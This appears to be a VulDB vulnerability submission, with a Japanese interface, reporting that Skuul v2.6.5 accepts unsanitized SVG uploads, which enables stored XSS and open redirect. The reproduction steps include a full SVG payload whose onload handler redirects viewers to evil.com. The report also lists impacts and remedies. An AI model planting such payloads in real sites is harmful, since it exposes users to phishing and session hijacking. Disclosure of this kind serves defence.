提出 #689012: yungifez Skuul v2.6.5 Open Redirect情報

タイトル	yungifez Skuul v2.6.5 Open Redirect
説明	Skuul version 2.6.5 allows the upload of unsanitized SVG files in the Edit School section. Since the application serves uploaded SVGs directly without sanitization or content-type enforcement, attackers can embed JavaScript or redirection payloads inside SVGs. When a user or administrator opens the uploaded image in a new tab, the browser executes the embedded script, resulting in a stored cross-site scripting (XSS) or open redirect attack. Steps to Reproduce: 1. Log in to the Skuul http://127.0.0.1:8000/login as Admin 2. Navigate to: http://sk.htb:8000/dashboard/schools/1/edit 3. Upload the SVG file with following content: <?xml version="1.0" standalone="yes"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg" onload="window.location='https://evil.com/'"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> </svg> 4. If any user such as (Super Admin, Student, Teacher or Parent) Open Image in New Tab. 5. The browser will automatically redirect to https://evil.com/. Impact: -) Automatic redirection to attacker-controlled websites (phishing/malware risk). -) Stored XSS possibility through malicious SVG payloads. -) User credential theft or session hijacking if same-origin. -) High impact if admin account is compromised, affecting all users. -) Loss of user trust and potential reputational damage to the platform. Recommendation: -) Disallow SVG uploads entirely, or -) Sanitize SVGs using libraries like DOMPurify, sanitize-svg, or similar before storage. -) Serve SVGs with the Content-Type: image/svg+xml header and force download where possible. -) Store and serve only rasterized versions (e.g., PNG/JPEG). Affected Version: Skuul v2.6.5 Product Source: -) Website: https://yungifez.github.io/skuul.org/ -) GitHub Repository: https://github.com/yungifez/skuul Credits Zeeshan Khan https://www.thezeeshankhan.site/
ソース	⚠️ https://gist.github.com/thezeekhan/7fc54fd44bc5f318be0350b367b2d8ff
ユーザー	Zeeshan Khan (UID 91384)
送信	2025年11月04日 17:57 (8 月 ago)
モデレーション	2025年11月29日 13:59 (25 days later)
ステータス	承諾済み
VulDBエントリ	333788 [yungifez Skuul School Management System 迄 2.6.5 SVG File edit クロスサイトスクリプティング]
ポイント	20

◂ 前概要次 ▸

Want to stay up to date on a daily basis?

Enable the mail alert feature now!